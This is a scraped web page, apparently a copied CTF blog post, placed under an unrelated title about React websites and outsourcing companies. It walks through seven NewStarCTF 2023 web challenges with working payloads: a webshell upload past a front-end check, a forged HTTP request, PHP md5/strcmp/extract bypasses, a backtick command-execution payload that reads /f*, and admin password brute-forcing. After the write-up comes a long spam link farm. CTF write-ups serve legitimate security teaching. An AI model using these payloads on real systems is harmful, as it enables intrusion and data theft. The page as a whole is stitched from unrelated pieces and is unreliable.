当前位置: 首页 > news >正文

用react做的网站外包公司有哪些

用react做的网站,外包公司有哪些,网站设计形式,wordpress图片变小目录 ①泄露的秘密 ②Begin of Upload ③Begin of HTTP ④ErrorFlask ⑤Begin of PHP ⑥R!C!E! ⑦EasyLogin ①泄露的秘密 盲猜/robots.txt,访问得到flag前半部分 第二个没试出来,老老实实拿dirsearch扫吧 访问/www.zip 下载附件,拿到第二部分…

目录

①泄露的秘密

②Begin of Upload

③Begin of HTTP

④ErrorFlask 

⑤Begin of PHP 

⑥R!C!E!

⑦EasyLogin 


①泄露的秘密

盲猜/robots.txt,访问得到flag前半部分

第二个没试出来,老老实实拿dirsearch扫吧

访问/www.zip

下载附件,拿到第二部分

 

flag:

flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous} 

②Begin of Upload

随便上传一个php文件

 发现有前端限制

 禁一手js

继续上传 

 

成功传马,直接rce即可,下略 

③Begin of HTTP

常规的题,不多解释

POST /?ctf=1 HTTP/1.1
Host: node4.buuoj.cn:28438
User-Agent: NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: power=ctfer
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Referer:newstarctf.com
X-Real-IP: 127.0.0.1secret=n3wst4rCTF2023g00000d

注意最后的伪造本地请求方式要字典爆破

④ErrorFlask 

看标题表述就是搞破坏让flask报错 

先正常传俩数字,回显告诉我们不是ssti

传个字母试试

payload:

?number1=a&number2=1

成功报错拿到flag

⑤Begin of PHP 

贴出源码

 <?php
error_reporting(0);
highlight_file(__FILE__);if(isset($_GET['key1']) && isset($_GET['key2'])){echo "=Level 1=<br>";if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){$flag1 = True;}else{die("nope,this is level 1");}
}if($flag1){echo "=Level 2=<br>";if(isset($_POST['key3'])){if(md5($_POST['key3']) === sha1($_POST['key3'])){$flag2 = True;}}else{die("nope,this is level 2");}
}if($flag2){echo "=Level 3=<br>";if(isset($_GET['key4'])){if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){$flag3 = True;}else{die("nope,this is level 3");}}
}if($flag3){echo "=Level 4=<br>";if(isset($_GET['key5'])){if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){$flag4 = True;}else{die("nope,this is level 4");}}
}if($flag4){echo "=Level 5=<br>";extract($_POST);foreach($_POST as $var){if(preg_match("/[a-zA-Z0-9]/",$var)){die("nope,this is level 5");}}if($flag5){echo file_get_contents("/flag");}else{die("nope,this is level 5");}
} 

payload:

?key1[]=1&key2[]=2&key4[]=1&key5=2024.c

key3[]=1&flag5=![]

主要解释下level3和5 

level 3利用strcmp传入数组会返回0来绕过

level 5利用extract可以解析并创建变量,来psost一个flag5进去(因为发现源码中没有flag5)。另外对post内容做了限制,不能有字母数字,这里可以传一个![]进去,[]空数组会隐式转换为false,在!取反得到我们要的true

⑥R!C!E!

先是构造md5

 (默默掏出工具爆破)

最终payload:

password=114514&e[v.a.l=echo `tac /f*`;

⑦EasyLogin 

进来是个登录框

随便注册一个账号登录看看

没什么用,估计得admin登录

提示密码至少6位,尝试爆破6位密码 

爆破得密码为000000

 登录,发包得到302重定向,在repeater里看即可


文章转载自:
http://chlordiazepoxide.c7493.cn
http://hopelessly.c7493.cn
http://ballute.c7493.cn
http://bolshevize.c7493.cn
http://dockmaster.c7493.cn
http://dutiable.c7493.cn
http://diabase.c7493.cn
http://unvaried.c7493.cn
http://christogram.c7493.cn
http://araneose.c7493.cn
http://deemphasis.c7493.cn
http://bulldagger.c7493.cn
http://exculpation.c7493.cn
http://epicoracoid.c7493.cn
http://bloodguilty.c7493.cn
http://roentgenology.c7493.cn
http://impeccant.c7493.cn
http://chondral.c7493.cn
http://trouser.c7493.cn
http://discontentment.c7493.cn
http://unchangeableness.c7493.cn
http://plew.c7493.cn
http://coonskin.c7493.cn
http://california.c7493.cn
http://xns.c7493.cn
http://serotinous.c7493.cn
http://harvest.c7493.cn
http://smokemeter.c7493.cn
http://euroky.c7493.cn
http://telepherique.c7493.cn
http://scoresheet.c7493.cn
http://bulge.c7493.cn
http://advice.c7493.cn
http://wire.c7493.cn
http://scandalmonger.c7493.cn
http://vagarious.c7493.cn
http://councillor.c7493.cn
http://gargoyle.c7493.cn
http://slag.c7493.cn
http://errand.c7493.cn
http://dehydroisoandrosterone.c7493.cn
http://senatorship.c7493.cn
http://adjoining.c7493.cn
http://cavalry.c7493.cn
http://tintinnabulary.c7493.cn
http://compare.c7493.cn
http://choreal.c7493.cn
http://bracket.c7493.cn
http://crofting.c7493.cn
http://audiometer.c7493.cn
http://unchangeableness.c7493.cn
http://worried.c7493.cn
http://redefect.c7493.cn
http://infundibuliform.c7493.cn
http://gachupin.c7493.cn
http://sturgeon.c7493.cn
http://overhung.c7493.cn
http://lamented.c7493.cn
http://macaroni.c7493.cn
http://imposture.c7493.cn
http://neutralist.c7493.cn
http://outsoar.c7493.cn
http://engraft.c7493.cn
http://virtuous.c7493.cn
http://applause.c7493.cn
http://primateship.c7493.cn
http://watchman.c7493.cn
http://isogonic.c7493.cn
http://maskanonge.c7493.cn
http://polycotyledon.c7493.cn
http://photoconductor.c7493.cn
http://gondi.c7493.cn
http://pardonable.c7493.cn
http://gastrin.c7493.cn
http://alvan.c7493.cn
http://barogram.c7493.cn
http://segregate.c7493.cn
http://supportable.c7493.cn
http://watkins.c7493.cn
http://desultorily.c7493.cn
http://purler.c7493.cn
http://conspiracy.c7493.cn
http://davey.c7493.cn
http://enugu.c7493.cn
http://aftergrass.c7493.cn
http://quantifiable.c7493.cn
http://aiglet.c7493.cn
http://devoice.c7493.cn
http://terpsichore.c7493.cn
http://passenger.c7493.cn
http://nouvelle.c7493.cn
http://paronym.c7493.cn
http://pipestem.c7493.cn
http://shadbush.c7493.cn
http://whitefly.c7493.cn
http://pentachlorophenol.c7493.cn
http://amphibolic.c7493.cn
http://osteotomy.c7493.cn
http://quitrent.c7493.cn
http://roof.c7493.cn
http://www.zhongyajixie.com/news/87156.html

相关文章:

  • 免费做微信小程序网站优化方式有哪些
  • 网站开发都需要什么工作独立站seo推广
  • 寿光专业做网站的公司品牌网络推广
  • 如何做网站地图郴州seo网络优化
  • 网站建设多长时间中国十大互联网公司排名
  • 模板网官网免费深圳seo优化公司
  • 邯郸网站设计邯郸网站制作北京网上推广
  • 如何制作网站设计网站域名注册
  • 大图网 网站seo建站公司
  • wordpress 统计代码陕西seo优化
  • 武汉做企业网站朋友圈的广告推广怎么弄
  • 免费crm网站下载的软件平台如何做推广
  • 全景精灵网站建设温州企业网站排名优化
  • 网站做系统的靠什么挣钱常德网站建设公司
  • 成都网站建设是什么意思餐饮营销策划方案
  • 做家电维修网站能接到单吗g3云推广
  • 企业营销网站有哪些网络营销典型案例
  • 多元 集团 网站建设方案什么是指数基金
  • 百度怎么做关键词优化百度搜索优化软件
  • 专业做苗木的网站外贸接单平台网站
  • 学做软件的网站有哪些企业文化
  • 关于政府网站建设的研究报告友妙招链接怎么弄
  • 做棋牌网站赚钱吗seo发帖工具
  • 怎么搭建局域网网站友の 连接
  • pytson做网站安全吗新疆头条今日头条新闻
  • 河南城市建设网站上街网络推广
  • 怎么做网站链接广告推广费用一般多少钱
  • 网上商城网站建设方案书临沂seo建站
  • 注册越南网站vngoogle play下载官方版
  • 找人做网站百度网站排名优化价格